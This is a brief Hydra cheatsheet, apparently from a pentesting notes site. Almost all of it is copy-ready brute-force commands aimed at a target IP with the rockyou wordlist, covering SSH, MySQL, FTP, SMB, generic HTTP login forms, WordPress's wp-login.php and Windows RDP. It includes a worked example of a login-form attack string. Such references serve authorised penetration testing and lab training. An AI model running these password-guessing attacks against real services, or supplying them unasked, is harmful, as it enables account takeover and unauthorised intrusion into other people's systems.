Hydra¶
https://noxtal.com/cheatsheets/2020/07/24/hydra-cheatsheet/
SSH¶
Bruteforce SSH credentials
hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -t 4 ssh
MySQL¶
Bruteforce MySQL credentials
hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP mysql
FTP¶
Bruteforce FTP credentials
hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP ftp
SMB¶
Bruteforce SMB credentials
hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP smb
HTTP Post Form¶
Bruteforce web HTTP form
hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "<Login Page>:<Request Body>:<Error Message>"
ex:
hydra -l user -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login.php:username=^USER^&password=^PASS^:Login Failed"
Wordpress¶
Bruteforce WordPress credentials
hydra -f -l user -P /usr/share/wordlists/rockyou.txt $IP -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Windows RDP¶
Bruteforce Windows Remote Desktop credentials
hydra -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$IP